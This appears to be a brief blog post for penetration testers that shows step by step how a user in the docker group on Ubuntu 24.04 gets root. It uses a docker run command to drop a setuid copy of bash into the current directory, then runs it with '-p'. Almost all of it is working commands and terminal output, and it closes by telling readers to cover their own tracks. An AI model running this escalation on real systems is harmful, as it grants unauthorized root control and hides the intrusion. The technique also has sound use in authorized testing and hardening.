Linux Privilege Escalation with Docker
Note: I posted this orginally in 2017 before deleting it sometime later. I resurrected it just for you Dec 24, 2024
Pentesters, if you get on a box and the user is in the `docker` group, you can get root like so.
## SHOWING YOU THAT MY STUFF IS NOT OLD (this works)
#### UBUNTU
zachary@zbox:~/test$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 24.04.1 LTS
Release: 24.04
Codename: noble
#### DOCKER
zachary@zbox:~/test$ docker -v
Docker version 27.2.0, build 3ab4256
#### DATE RAN
zachary@zbox:~/test$ date
Tue Dec 24 12:46:52 PM CST 2024
## SEE THAT MY USER IS IN THE DOCKER GROUP
zachary@zbox:~/test$ groups
zachary adm cdrom sudo dip plugdev lpadmin lxd sambashare docker
## THE GOOD PART: USE DOCKER TO DROP A SHELL EXECUTABLE IN THE CURRENT DIR
zachary@zbox:~/test$ ls -l # look, there's nothing in my hands
total 0
zachary@zbox:~/test$ docker run --rm -v ./:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;"
zachary@zbox:~/test$ ls -l
total 973
-rwsrwxrwx 1 root root 1446024 Dec 24 12:36 rootshell # TADA!
## RUN IT (you need that '-p')
zachary@zbox:~/test$ ./rootshell -p
rootshell-5.2# whoami
root
rootshell-5.2# exit
## YOU COVER YOUR OWN TRACKS